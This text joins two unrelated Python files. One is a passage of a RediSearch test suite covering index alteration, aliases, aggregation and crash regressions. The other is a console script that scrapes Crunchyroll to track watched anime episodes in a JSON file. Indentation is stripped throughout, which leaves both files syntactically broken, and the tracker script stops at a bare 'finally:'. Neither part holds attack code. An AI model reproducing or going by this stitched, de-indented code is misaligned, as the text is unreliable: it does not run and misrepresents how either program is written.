env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f2', 'TEXT')
env.cmd('FT.ADD', 'idx', 'doc2', 1.0, 'FIELDS', 'f1', 'hello', 'f2', 'world')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx', 'world')
env.assertEqual([1, 'doc2', ['f1', 'hello', 'f2', 'world']], ret)
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'f3', 'TEXT', 'SORTABLE')
for x in range(10):
env.cmd('FT.ADD', 'idx', 'doc{}'.format(x + 3), 1.0,
'FIELDS', 'f1', 'hello', 'f3', 'val{}'.format(x))
for _ in env.retry_with_reload():
# Test that sortable works
res = env.cmd('FT.SEARCH', 'idx', 'hello', 'SORTBY', 'f3', 'DESC')
exp = [12, 'doc12', ['f1', 'hello', 'f3', 'val9'], 'doc11', ['f1', 'hello', 'f3', 'val8'], 'doc10', ['f1', 'hello', 'f3', 'val7'], 'doc9', ['f1', 'hello', 'f3', 'val6'], 'doc8', ['f1', 'hello', 'f3', 'val5'], 'doc7', [
'f1', 'hello', 'f3', 'val4'], 'doc6', ['f1', 'hello', 'f3', 'val3'], 'doc5', ['f1', 'hello', 'f3', 'val2'], 'doc4', ['f1', 'hello', 'f3', 'val1'], 'doc3', ['f1', 'hello', 'f3', 'val0']]
assertResultsEqual(env, exp, res)
# Test that we can add a numeric field
env.cmd('FT.ALTER', 'idx', 'SCHEMA', 'ADD', 'n1', 'NUMERIC')
env.cmd('FT.ADD', 'idx', 'docN1', 1.0, 'FIELDS', 'n1', 50)
env.cmd('FT.ADD', 'idx', 'docN2', 1.0, 'FIELDS', 'n1', 250)
for _ in env.retry_with_reload():
res = env.cmd('FT.SEARCH', 'idx', '@n1:[0 100]')
env.assertEqual([1, 'docN1', ['n1', '50']], res)
def testAlterValidation(env):
# Test the constraints of the ALTER command
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'f0', 'TEXT')
for x in range(1, 32):
env.cmd('FT.ALTER', 'idx1', 'SCHEMA', 'ADD', 'f{}'.format(x), 'TEXT')
# OK for now.
# Adding one more should now exceed the text field limit
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'idx1', 'SCHEMA', 'ADD', 'tooBig', 'TEXT')
env.cmd('FT.CREATE', 'idx2', 'MAXTEXTFIELDS', 'SCHEMA', 'f0', 'TEXT')
# print env.cmd('FT.INFO', 'idx2')
for x in range(1, 50):
env.cmd('FT.ALTER', 'idx2', 'SCHEMA', 'ADD', 'f{}'.format(x + 1), 'TEXT')
env.cmd('FT.ADD', 'idx2', 'doc1', 1.0, 'FIELDS', 'f50', 'hello')
for _ in env.retry_with_reload():
ret = env.cmd('FT.SEARCH', 'idx2', '@f50:hello')
env.assertEqual([1, 'doc1', ['f50', 'hello']], ret)
env.cmd('FT.CREATE', 'idx3', 'SCHEMA', 'f0', 'text')
# Try to alter the index with garbage
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx3',
'SCHEMA', 'ADD', 'f1', 'TEXT', 'f2', 'garbage')
ret = to_dict(env.cmd('ft.info', 'idx3'))
env.assertEqual(1, len(ret['fields']))
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER',
'nonExist', 'SCHEMA', 'ADD', 'f1', 'TEXT')
# test with no fields!
env.assertRaises(redis.ResponseError, env.cmd, 'FT.ALTER', 'idx2', 'SCHEMA', 'ADD')
def testIssue366_1(env):
if env.is_cluster():
raise unittest.SkipTest('ADDHASH unsupported!')
# Test random RDB regressions, see GH 366
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.hmset('foo', {'textfield': 'blah', 'numfield': 1})
env.cmd('FT.ADDHASH', 'idx1', 'foo', 1, 'replace')
env.cmd('FT.DEL', 'idx1', 'foo')
for _ in env.retry_with_reload():
pass  # just ensure it doesn't crash
def testIssue366_2(env):
# FT.CREATE atest SCHEMA textfield TEXT numfield NUMERIC
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world"}' FIELDS textfield sometext numfield 1234
# FT.ADD atest anId 1 PAYLOAD '{"hello":"world2"}' REPLACE PARTIAL FIELDS numfield 1111
# shutdown
env.cmd('FT.CREATE', 'idx1', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
env.cmd('FT.ADD', 'idx1', 'doc1', 1, 'PAYLOAD', '{"hello":"world"}',
'FIELDS', 'textfield', 'sometext', 'numfield', 1234)
env.cmd('ft.add', 'idx1', 'doc1', 1,
'PAYLOAD', '{"hello":"world2"}',
'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 'sometext', 'numfield', 1111)
for _ in env.retry_with_reload():
pass  # just ensure the reload doesn't crash
def testIssue654(env):
# Crashes during FILTER
env.cmd('ft.create', 'idx', 'schema', 'id', 'numeric')
env.cmd('ft.add', 'idx', 1, 1, 'fields', 'id', 1)
env.cmd('ft.add', 'idx', 2, 1, 'fields', 'id', 2)
res = env.cmd('ft.search', 'idx', '*', 'filter', '@version', 0, 2)
def testReplaceReload(env):
env.cmd('FT.CREATE', 'idx2', 'SCHEMA', 'textfield', 'TEXT', 'numfield', 'NUMERIC')
# Create a document and then replace it.
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'FIELDS', 'textfield', 's1', 'numfield', 99)
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's100', 'numfield', 990)
env.dump_and_reload()
# RDB Should still be fine
env.cmd('FT.ADD', 'idx2', 'doc2', 1.0, 'REPLACE', 'PARTIAL',
'FIELDS', 'textfield', 's200', 'numfield', 1090)
doc = to_dict(env.cmd('FT.GET', 'idx2', 'doc2'))
env.assertEqual('s200', doc['textfield'])
env.assertEqual('1090', doc['numfield'])
# command = 'FT.CREATE idx SCHEMA '
# for i in range(255):
# command += 't%d NUMERIC SORTABLE ' % i
# command = command[:-1]
# r.execute_command(command)
# r.execute_command('save')
# // reload from ...
# r.execute_command('FT.ADD idx doc1 1.0 FIELDS t0 1')
def testIssue417(env):
command = ['ft.create', 'idx', 'schema']
for x in range(255):
command += ['t{}'.format(x), 'numeric', 'sortable']
command = command[:-1]
env.cmd(*command)
for _ in env.reloading_iterator():
try:
env.execute_command('FT.ADD', 'idx', 'doc1', '1.0', 'FIELDS', 't0', '1')
except redis.ResponseError as e:
env.assertTrue('already' in e.message.lower())
# >FT.CREATE myIdx SCHEMA title TEXT WEIGHT 5.0 body TEXT url TEXT
# >FT.ADD myIdx doc1 1.0 FIELDS title "hello world" body "lorem ipsum" url "www.google.com"
# >FT.SEARCH myIdx "no-as"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
# >FT.SEARCH myIdx "no-as"
# (error) Unknown Index name
def testIssue422(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'WEIGHT', '5.0',
'body', 'TEXT',
'url', 'TEXT')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'FIELDS', 'title', 'hello world', 'body', 'lorem ipsum', 'url', 'www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'no-as')
env.assertEqual([0], rv)
def testIssue446(env):
env.cmd('ft.create', 'myIdx', 'schema',
'title', 'TEXT', 'SORTABLE')
env.cmd('ft.add', 'myIdx', 'doc1', '1.0', 'fields', 'title', 'hello world', 'body', 'lorem ipsum', 'url', '"www.google.com')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([1], rv)
# Related - issue 635
env.cmd('ft.add', 'myIdx', 'doc2', '1.0', 'fields', 'title', 'hello')
rv = env.cmd('ft.search', 'myIdx', 'hello', 'limit', '0', '0')
env.assertEqual([2], rv)
def testTimeoutSettings(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'BLAHBLAH').raiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'RETURN').notRaiseError()
env.expect('ft.search', 'idx', '*', 'ON_TIMEOUT', 'FAIL').notRaiseError()
def testAlias(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.create', 'idx2', 'schema', 't1', 'text')
env.cmd('ft.aliasAdd', 'myIndex', 'idx')
env.cmd('ft.add', 'myIndex', 'doc1', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'idx', 'hello')
env.assertEqual([1, 'doc1', ['t1', 'hello']], r)
r2 = env.cmd('ft.search', 'myIndex', 'hello')
env.assertEqual(r, r2)
# try to add the same alias again; should be an error
env.expect('ft.aliasAdd', 'myIndex', 'idx2').raiseError()
env.expect('ft.aliasAdd', 'alias2', 'idx').notRaiseError()
# now delete the index
env.cmd('ft.drop', 'myIndex')
# index list should be cleared now. This can be tested by trying to alias
# the old alias to a different index
env.cmd('ft.aliasAdd', 'myIndex', 'idx2')
env.cmd('ft.aliasAdd', 'alias2', 'idx2')
env.cmd('ft.add', 'myIndex', 'doc2', 1.0, 'fields', 't1', 'hello')
r = env.cmd('ft.search', 'alias2', 'hello')
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# check that aliasing one alias to another returns an error. This will
# end up being confusing
env.expect('ft.aliasAdd', 'alias3', 'myIndex').raiseError()
# check that deleting the alias works as expected
env.expect('ft.aliasDel', 'myIndex').notRaiseError()
env.expect('ft.search', 'myIndex', 'foo').raiseError()
# create a new index and see if we can use the old name
env.cmd('ft.create', 'idx3', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx3', 'doc3', 1.0, 'fields', 't1', 'foo')
env.cmd('ft.aliasAdd', 'myIndex', 'idx3')
# also, check that this works in rdb save
for _ in env.retry_with_rdb_reload():
r = env.cmd('ft.search', 'myIndex', 'foo')
env.assertEqual([1L, 'doc3', ['t1', 'foo']], r)
# Check that we can move an alias from one index to another
env.cmd('ft.aliasUpdate', 'myIndex', 'idx2')
r = env.cmd('ft.search', 'myIndex', "hello")
env.assertEqual([1L, 'doc2', ['t1', 'hello']], r)
# Test that things like ft.get, ft.aggregate, etc. work
r = env.cmd('ft.get', 'myIndex', 'doc2')
env.assertEqual(['t1', 'hello'], r)
r = env.cmd('ft.aggregate', 'myIndex', 'hello', 'LOAD', '1', '@t1')
env.assertEqual([1, ['t1', 'hello']], r)
r = env.cmd('ft.del', 'myIndex', 'doc2')
env.assertEqual(1, r)
def testNoCreate(env):
env.cmd('ft.create', 'idx', 'schema', 'f1', 'text')
env.expect('ft.add', 'idx', 'doc1', 1, 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'hello').raiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'fields', 'f1', 'hello').notRaiseError()
env.expect('ft.add', 'idx', 'doc1', 1, 'replace', 'nocreate', 'fields', 'f1', 'world').notRaiseError()
# Standalone functionality
def testIssue484(env):
# Issue with split
# 127.0.0.1:6379> ft.drop productSearch1
# OK
# 127.0.0.1:6379> "FT.CREATE" "productSearch1" "NOSCOREIDX" "SCHEMA" "productid" "TEXT" "categoryid" "TEXT" "color" "TEXT" "timestamp" "NUMERIC"
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID1" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID2" "1.0" "REPLACE" "FIELDS" "productid" "1" "categoryid" "small cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID3" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "white" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID4" "1.0" "REPLACE" "FIELDS" "productid" "2" "categoryid" "Big cars" "color" "green" "categoryType" 0
# OK
# 127.0.0.1:6379> "FT.ADD" "productSearch1" "GUID5" "1.0" "REPLACE" "FIELDS" "productid" "3" "categoryid" "cars" "color" "blue" "categoryType" 0
# OK
# 127.0.0.1:6379> FT.AGGREGATE productSearch1 * load 2 @color @categoryid APPLY "split(format(\"%s-%s\",@color,@categoryid),\"-\")" as value GROUPBY 1 @value REDUCE COUNT 0 as value_count
env.cmd('ft.create', 'productSearch1', 'noscoreidx', 'schema', 'productid',
'text', 'categoryid', 'text', 'color', 'text', 'timestamp', 'numeric')
env.cmd('ft.add', 'productSearch1', 'GUID1', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID2', '1.0', 'REPLACE', 'FIELDS', 'productid', '1', 'categoryid', 'small cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID3', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'white', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID4', '1.0', 'REPLACE', 'FIELDS', 'productid', '2', 'categoryid', 'Big cars', 'color', 'green', 'categoryType', 0)
env.cmd('ft.add', 'productSearch1', 'GUID5', '1.0', 'REPLACE', 'FIELDS', 'productid', '3', 'categoryid', 'cars', 'color', 'blue', 'categoryType', 0)
res = env.cmd('FT.AGGREGATE', 'productSearch1', '*',
'load', '2', '@color', '@categoryid',
'APPLY', 'split(format("%s-%s",@color,@categoryid),"-")', 'as', 'value',
'GROUPBY', '1', '@value',
'REDUCE', 'COUNT', '0', 'as', 'value_count',
'SORTBY', '4', '@value_count', 'DESC', '@value', 'ASC')
expected = [6, ['value', 'white', 'value_count', '2'], ['value', 'cars', 'value_count', '2'], ['value', 'small cars', 'value_count', '1'], ['value', 'blue', 'value_count', '2'], ['value', 'Big cars', 'value_count', '2'], ['value', 'green', 'value_count', '1']]
assertAggrowsEqual(env, expected, res)
for var in expected:
env.assertIn(var, res)
def testIssue501(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.cmd('FT.DICTADD', 'slang', 'timmies', 'toque', 'toonie', 'serviette', 'kerfuffle', 'chesterfield')
rv = env.cmd('FT.SPELLCHECK', 'incidents', 'qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq',
'TERMS', 'INCLUDE', 'slang', 'TERMS', 'EXCLUDE', 'slang')
env.assertEqual("qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq", rv[0][1])
env.assertEqual([], rv[0][2])
def testIssue589(env):
env.cmd('FT.CREATE', 'incidents', 'SCHEMA', 'report', 'TEXT')
env.cmd('FT.ADD', 'incidents', 'doc1', 1.0, 'FIELDS', 'report', 'report content')
env.expect('FT.SPELLCHECK', 'incidents', 'report :').error().contains("Syntax error at offset")
def testIssue621(env):
env.expect('ft.create', 'test', 'SCHEMA', 'uuid', 'TAG', 'title', 'TEXT').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'uuid', 'foo', 'title', 'bar').equal('OK')
env.expect('ft.add', 'test', 'a', '1', 'REPLACE', 'PARTIAL', 'FIELDS', 'title', 'bar').equal('OK')
env.expect('ft.search', 'test', '@uuid:{foo}').equal([1L, 'a', ['uuid', 'foo', 'title', 'bar']])
# Server crash on doc names that conflict with index keys #666
def testIssue666(env):
env.cmd('ft.create', 'foo', 'schema', 'bar', 'text')
env.cmd('ft.add', 'foo', 'mydoc', 1, 'fields', 'bar', 'one two three')
# crashes here
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'fields', 'bar', 'four five six')
# try with replace:
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'ft:foo/two', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
with env.assertResponseError():
env.cmd('ft.add', 'foo', 'idx:foo', '1', 'REPLACE',
'FIELDS', 'bar', 'four five six')
env.cmd('ft.add', 'foo', 'mydoc1', 1, 'fields', 'bar', 'four five six')
# 127.0.0.1:6379> flushdb
# OK
# 127.0.0.1:6379> ft.create foo SCHEMA bar text
# OK
# 127.0.0.1:6379> ft.add foo mydoc 1 FIELDS bar "one two three"
# OK
# 127.0.0.1:6379> keys *
# 1) "mydoc"
# 2) "ft:foo/one"
# 3) "idx:foo"
# 4) "ft:foo/two"
# 5) "ft:foo/three"
# 127.0.0.1:6379> ft.add foo "ft:foo/two" 1 FIELDS bar "four five six"
# Could not connect to Redis at 127.0.0.1:6379: Connection refused
def testPrefixDeletedExpansions(env):
from unittest import SkipTest
# first get the gc implementation. This doesn't work on forkgc currently
gcp = env.cmd('ft.config', 'get', 'gc_policy')[0][1]
if gcp.lower() == 'fork':
raise SkipTest('test not supported on fork gc')
env.cmd('ft.create', 'idx', 'schema', 'txt1', 'text', 'tag1', 'tag')
# get the number of maximum expansions
maxexpansions = int(env.cmd('ft.config', 'get', 'maxexpansions')[0][1])
for x in range(maxexpansions):
env.cmd('ft.add', 'idx', 'doc{}'.format(x), 1, 'fields',
'txt1', 'term{}'.format(x), 'tag1', 'tag{}'.format(x))
for x in range(maxexpansions):
env.cmd('ft.del', 'idx', 'doc{}'.format(x))
env.cmd('ft.add', 'idx', 'doc_XXX', 1, 'fields', 'txt1', 'termZZZ', 'tag1', 'tagZZZ')
# r = env.cmd('ft.search', 'idx', 'term*')
# print(r)
# r = env.cmd('ft.search', 'idx', '@tag1:{tag*}')
# print(r)
tmax = time.time() + 0.5  # 500ms max
iters = 0
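# keep forcing GC until the expansions left by the deleted terms are purged
# and the surviving doc matches both prefix queries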
while time.time() < tmax:
iters += 1
env.cmd('ft.debug', 'gc_forceinvoke', 'idx')
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
if r[0]:
break
print 'did {} iterations'.format(iters)
r = env.cmd('ft.search', 'idx', '@txt1:term* @tag1:{tag*}')
env.assertEqual([1, 'doc_XXX', ['txt1', 'termZZZ', 'tag1', 'tagZZZ']], r)
def testOptionalFilter(env):
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
for x in range(100):
env.cmd('ft.add', 'idx', 'doc_{}'.format(x), 1, 'fields', 't1', 'hello world word{}'.format(x))
print env.cmd('ft.explain', 'idx', '(~@t1:word20)')
# print(r)
r = env.cmd('ft.search', 'idx', '~(word20 => {$weight: 2.0})')
print(r)
def testIssue736(env):
# 1. create the schema, we need a tag field
env.cmd('ft.create', 'idx', 'schema', 't1', 'text', 'n2', 'numeric', 't2', 'tag')
# 2. create a single document to initialize at least one RSAddDocumentCtx
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello', 't2', 'foo, bar')
# 3. create a second document with many filler fields to force a realloc:
extra_fields = []
for x in range(20):
extra_fields += ['nidx_fld{}'.format(x), 'val{}'.format(x)]
extra_fields += ['n2', 'not-a-number', 't2', 'random, junk']
with env.assertResponseError():
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', *extra_fields)
def testCriteriaTesterDeactivated():
env = Env(moduleArgs='_MAX_RESULTS_TO_UNSORTED_MODE 1')
env.cmd('ft.create', 'idx', 'schema', 't1', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1, 'fields', 't1', 'hello1 hey hello2')
env.cmd('ft.add', 'idx', 'doc2', 1, 'fields', 't1', 'hello2 hey')
env.cmd('ft.add', 'idx', 'doc3', 1, 'fields', 't1', 'hey')
env.expect('ft.search', 'idx', '(hey hello1)|(hello2 hey)').equal([2L, 'doc1', ['t1', 'hello1 hey hello2'], 'doc2', ['t1', 'hello2 hey']])
def grouper(iterable, n, fillvalue=None):
"Collect data into fixed-length chunks or blocks"
from itertools import izip_longest
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
return izip_longest(fillvalue=fillvalue, *args)
def to_dict(r):
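# e.g. to_dict(['f1', 'v1', 'f2', 'v2']) -> {'f1': 'v1', 'f2': 'v2'}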
return {r[i]: r[i + 1] for i in range(0, len(r), 2)}
|
Crunchyroll_Tracker.py
|
import cloudscraper
from bs4 import BeautifulSoup
import json
import copy
import time
from colorama import Fore, Style
import threading
# GENERAL
verif_sair = False
# if anime.json does not exist:
try:
with open('anime.json', 'r') as anime_json:
pass
except FileNotFoundError:
print('Creating file...')
with open('anime.json', 'w') as anime_json:
json_data = []
json.dump(json_data, anime_json)
print('File created!')
# PARSING THE INFORMATION
scraper = cloudscraper.create_scraper()
# FUNCTIONS
def alpha_sort(dictionaries):
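# each tracked entry is a single-key dict, so returning its first key
# (the anime name) makes the list sort alphabetically by name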
for i in dictionaries:
return i
def check_list():
print('These are the animes you are tracking:')
with open('anime.json', 'r') as anime_json:
json_data = json.load(anime_json)
# FOR EACH ELEMENT (DICTIONARY) IN THE LIST -> FOR EACH KEY IN THAT ELEMENT (DICTIONARY)
for anime in json_data:
for name in anime:
print(f'{Fore.BLUE}{Style.BRIGHT}{name}{Style.RESET_ALL}')
def check_anime():
anime_check = input('>>> Which anime do you want to check? ')
anime_check = anime_check.strip()
verif_anime = False
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
# OPENING THE LIST STORED UNDER THE ANIME KEY
for anime in json_data:
# TAKING THE KEY OF EACH DICTIONARY, WHICH IS THE ANIME NAME
for name in anime:
if name.lower() == anime_check.lower():
verif_anime = True
for i in range(0, len(anime[name])):
line = f" Season: {anime[name][i]['season']} - Last Episode Released:" \
f" {anime[name][i]['last available episode']} - " \
f"Last episode you watched: {anime[name][i]['last watched episode']}"
print(line)
if verif_anime is True:
break
if verif_anime is False:
print(f'Anime {anime_check} is not in your list')
def add_to_list():
verif_site = False
verif_list = False
anime_add = input('>>> Inform the anime you want to be tracked: ')
anime_add = anime_add.strip()
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
for anime in json_data:
for name in anime:
if anime_add.lower() == name.lower():
print('Anime already on the list!')
verif_list = True
break
if verif_list is False:
try:
letter = anime_add[0]
except IndexError:
print('Invalid Anime')
else:
if str.isalpha(letter) is True:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/alpha',
params={'group': letter.lower()})
else:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/alpha', params={'group': 'numeric'})
soup = BeautifulSoup(url.content, features='lxml')
data = soup.find('ul', {'class': "landscape-grid"})
data = data.find_all('li')
for tag in data:
anime_name = tag.div.a['title']
if anime_name.lower() == anime_add.lower():
anime_add = anime_name
anime_url = ('https://www.crunchyroll.com' + tag.div.a['href'])
anime_url_s = scraper.get('https://www.crunchyroll.com' + tag.div.a['href'])
# CHECKING THE LAST EPISODE
soup = BeautifulSoup(anime_url_s.content, features='lxml')
data = soup.find('ul', {'class': "list-of-seasons cf"})
data_2 = data.find_all('li', {'class': "season small-margin-bottom"})
# CHANGES START FROM HERE!!
if len(data_2) == 0:
try:
episode_num = data.div.span.text.strip()
episode_title = data.div.p.text.strip()
except AttributeError:
# fall back to placeholders so dict_anime can still be built below
episode_num = 'Episódio -'
episode_title = '-'
finally:
dict_anime = {
anime_add: [{'season': '-', 'last available episode': episode_num + ' - ' + episode_title,
'last watched episode': 'Episódio -', 'url': anime_url, 'season_id': 1}]}
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
json_data.append(dict_anime)
json_data.sort(key=alpha_sort)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
print(f'Anime {anime_add} is now being tracked!')
verif_site = True
break
elif len(data_2) > 0:
data = data_2
list_value = []
ordem = len(data_2) + 1
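# season blocks are numbered from the top of the page down, so the first
# block (assumed to be the newest season) gets the highest season_id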
for tag_anime in data:
ordem = ordem - 1
sub_anime = tag_anime.a['title']
try:
episode_num = tag_anime.find('div').span.text.strip()
episode_title = tag_anime.find('div').p.text.strip()
except AttributeError:
episode_num = 'Episódio -'
episode_title = '-'
finally:
dict_value = {'season': sub_anime,
'last available episode': episode_num + ' - ' + episode_title,
'last watched episode': 'Episódio -', 'url': anime_url, 'season_id': ordem}
list_value.append(dict_value)
list_value.sort(key=lambda e: e['season_id'], reverse=True)
dict_anime = {anime_add: list_value}
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
json_data.append(dict_anime)
json_data.sort(key=alpha_sort)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
print(f'Anime {anime_add} is now being tracked!')
verif_site = True
break
if verif_site is False:
print(f'Anime {anime_add} is not on Crunchyroll')
def update_list():
option_up = input('>>> Which anime do you want to update in your list? ')
option_up = option_up.strip()
verif_episode = False
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
# OPENING THE LIST STORED UNDER THE ANIME KEY
for anime in json_data:
# TAKING THE KEY OF EACH DICTIONARY, WHICH IS THE ANIME NAME
for name in anime:
if name.lower() == option_up.lower():
option_up = name
verif_episode = True
if verif_episode is True:
print(f'{option_up}:')
for seasons in anime[option_up]:
print(f"{seasons['season']} - season ID: {seasons['season_id']}")
print('')
season_id = input('>>> Inform the season id of the season you want to update: ')
try:
season_id = int(season_id)
except ValueError:
print('Invalid ID')
else:
verif_id = False
for seasons in anime[option_up]:
if season_id == seasons['season_id']:
anime_dict = seasons
verif_id = True
break
if verif_id is True:
try:
episode_update = input('>>> Inform the number of the last episode'
' you watched from this anime: ')
episode_update_int = int(episode_update)
except ValueError:
print(f'>>> Invalid episode {episode_update}')
else:
a = (seasons['last available episode']).split(' ')
a = a[1]
if episode_update_int > int(a):
print(f'>>> Episode {episode_update} exceeds the last released episode')
break
else:
anime_dict_update = copy.deepcopy(anime_dict)
anime_dict_update['last watched episode'] = f'Episódio {episode_update}'
json_data.remove(anime)
anime[option_up].remove(anime_dict)
anime[option_up].append(anime_dict_update)
anime[option_up].sort(key=lambda e: e['season_id'], reverse=True)
json_data.append(anime)
json_data.sort(key=alpha_sort)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
anime_json.truncate()
print('Anime updated!')
break
else:
print('Invalid ID')
break
if verif_episode is False:
print(f'>>> Anime {option_up} is not in your list')
def delete_from_list():
verif_del = False
anime_del = input('>>> Inform the anime you want to stop tracking: ')
anime_del = anime_del.strip()
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
for anime in json_data:
for name in anime:
if name.lower() == anime_del.lower():
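# rebuild the exact {name: seasons} dict so json_data.remove() can match it by value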
anime_dict = [i[name] for i in json_data if name in i]
anime_dict = {name: anime_dict[0]}
json_data.remove(anime_dict)
anime_json.seek(0)
json.dump(json_data, anime_json, indent=2)
anime_json.truncate()
print(f'Anime {name} deleted!')
verif_del = True
break
if verif_del is False:
print(f'Anime {anime_del} is not on your list')
def check_update_crunchy():
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/updated')
soup = BeautifulSoup(url.content, features='lxml')
info = soup.find_all('a', {'itemprop': "url", 'token': "shows-portraits"})
info_ep = []
for tag in info[0: 15]:
info_ep.append(tag.find('span', {'class': "series-data block ellipsis"}).text)
print('These are the latest updated animes:')
for i in range(0, 15):
print(f" {Fore.MAGENTA}{info[i]['title']} => {info_ep[i].strip()}{Style.RESET_ALL}")
def check_alpha_crunchy():
letter = input('>>> Type the letter or number you want to check: ')
# IN CASE USER TYPES MORE THAN ONE LETTER:
try:
letter = letter[0]
except IndexError:
print('Invalid option')
else:
if str.isalpha(letter) is True:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/alpha', params={'group': letter.lower()})
else:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/alpha', params={'group': 'numeric'})
soup = BeautifulSoup(url.content, features='lxml')
data = soup.find('ul', {'class': "landscape-grid"})
data = data.find_all('li')
for tag in data:
print(tag.div.a['title'])
def get_out():
global verif_sair
verif_sair = True
def interface():
global verif_sair
while verif_sair is False:
# - USER INTERFACE - #
print('')
print('Choose your option \n'
'1 - Check your list \n'
'2 - Check a specific anime in your list \n'
'3 - Add Anime to your list \n'
'4 - Update your last watched episodes \n'
'5 - Delete Anime from your list \n'
'6 - Check all updated animes from Crunchy \n'
'7 - Check all anime from Crunchy alphabetically \n'
'0 - Quit')
try:
option = input('>>> ')
print('')
if int(option) < 0 or int(option) > 7:
raise Exception
except Exception:
print(f'>>> Invalid {option} option')
print('')
else:
if option == '1':
check_list()
elif option == '2':
check_anime()
elif option == '3':
add_to_list()
elif option == '4':
update_list()
elif option == '5':
delete_from_list()
elif option == '6':
check_update_crunchy()
elif option == '7':
check_alpha_crunchy()
elif option == '0':
get_out()
else:
exit()
# --------------------------------------------------------------------------------------------------- #
def check_update_continually():
global verif_sair
while True:
url = scraper.get('https://www.crunchyroll.com/pt-br/videos/anime/updated')
soup = BeautifulSoup(url.content, features='lxml')
info = soup.find_all('a', {'itemprop': "url", 'token': "shows-portraits"})
info_dict_url = {}
info_dict_num = {}
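# map each of the 15 most recently updated titles to its page url and
# to its latest 'Episódio N' label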
for tag in info[0: 15]:
info_dict_url[tag['title']] = tag['href']
info_dict_num[tag['title']] = tag.find('span', {'class': "series-data block ellipsis"}).text.strip()
with open('anime.json', 'r+') as anime_json:
json_data = json.load(anime_json)
for anime in json_data:
for name in anime:
if name in info_dict_url:
last_watched = anime[name][0]['last watched episode'].split(' ')
last_watched = last_watched[1]
last_released = info_dict_num[name].split(' ')[1]
verif_episode = False
try:
if int(last_watched) != int(last_released):
verif_episode = True
except ValueError:
verif_episode = True
finally:
